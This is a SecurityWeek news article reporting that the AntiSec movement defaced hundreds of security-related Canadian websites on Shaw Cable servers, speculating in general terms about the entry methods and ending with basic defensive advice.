Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Application Security

AntiSec Remains Active – Defaces Hundreds of Canadian Websites

On Wednesday, the AntiSec movement defaced hundreds of websites in what was said to be proof that the movement works just fine without Sabu, their alleged leader who was arrested and flipped by the FBI last year.

On Wednesday, the AntiSec movement defaced hundreds of websites in what was said to be proof that the movement works just fine without Sabu, their alleged leader who was arrested and flipped by the FBI last year.

The sites that were defaced have something in common, they were security related and were all hosted by Shaw Cable directly, or by its subsidiary Mountain Cablevision, both of which are in Canada.

AntiSec Defaces Security Sites In Canada“Our Vessel sailed through their servers collecting all information they owned. These companies earn money exploiting the fear of the people and their feeling of daily life state sponsored insecurity,” an AntiSec statement explained.

“We are doing this not only to cause embarrassment and disruption to the security community but to show we are still alive and well… Law enforcement collaborators, and military contractors, private security companies beware: we’re coming for your mail spools, barely legal porn, your sister’s pix and confidential documents.”

The attack targeted three different servers. One was a dedicated hosting account, while the other two leveraged shared hosting. The security related websites such as datasci.net, trojan-sis.com, e.password.com, and securitytrainingsupport.com, were announced by AntiSec, but hundreds of others were caught in the crossfire.

At the time this story was written, a majority of the attacked domains were offline completely or reporting database connection errors. A full list of the domains present on the servers attacked can be seen here.

When it comes to the shared hosting environments, the likely avenue of attack exploited in this case was Remote File Inclusion (RFI). This would have allowed AntiSec supporters full access to the targeted website after uploading a malicious shell script. Depending on the permissions of the server itself, access to every other domain hosted on it could be gained form that point.

Another possible access point, based on viewing versions of the targeted websites before they were attacked, is SQL Injection (SQLi). In the past, this method of attack has allowed AntiSec supporters to wreak havoc on a domain, and walk off with confidential and sensitive information. SQLi will also allow mass attacks within a shared environment due to the fact that the databases are often stored locally.

SecurityWeek reached out and asked about the methods used during the attacks, given that the defacement message mentioned backdoors into the servers, but were turned away. The only comment for the record was “Also Cocks.” (For the unfamiliar, this term can be used several ways. One is lulz, or amusement. The other is a quick way to tell someone to go away. AntiSec doesn’t always like to give away their methods, and when they do it’s often within the defacement message itself.)

Advertisement. Scroll to continue reading.

Earlier this month, after the FBI announced the arrest of Sabu and the fact that they had turned him in order to collect evidence against other LulzSec members and Anonymous supporters, one Special Agent close to the case mentioned that the arrest had cut the head off of the movement.

That same day, AntiSec targeted Panda Security, defacing a webserver that hosting several sub-domains used by the company. According to AntiSec’s claims, Panda has helped put 25 people behind bars for their involvement in various operations championed by Anonymous, in addition to lurking on their public IRC space in an attempt to identify various chat participants.

Panda’s Technical Director, Luis Corrons, commented, “Even though we have not helped LE to bring to jail any LulzSec member, I would have loved to be involved in that.” Panda recovered the webserver within hours, and no critical information was lost. The point that AntiSec is making should be clear, just because people have been arrested, the threat that supporters of the movement pose has not gone away. Those who celebrated and figured that the threat had passed are in for a rude awakening should they let their guard down.

As always, organizations should check their critical web applications and protect the assets that are most valuable, which is often the information collected for day to day operations. Proper coding practices and security auditing, system and software patches for the webservers, leveraging the rule of least privilege and disabling services that are non-essential are just some of the steps that will prevent basic attacks from working.

Just remember, if an attacker is targeting your organization directly, there’s little you can do to stop them as they’re likely to get in eventually, which is why incident response is just as important as risk management.

Written By

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Identity & Access

Zero trust is not a replacement for identity and access management (IAM), but is the extension of IAM principles from people to everyone and...

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.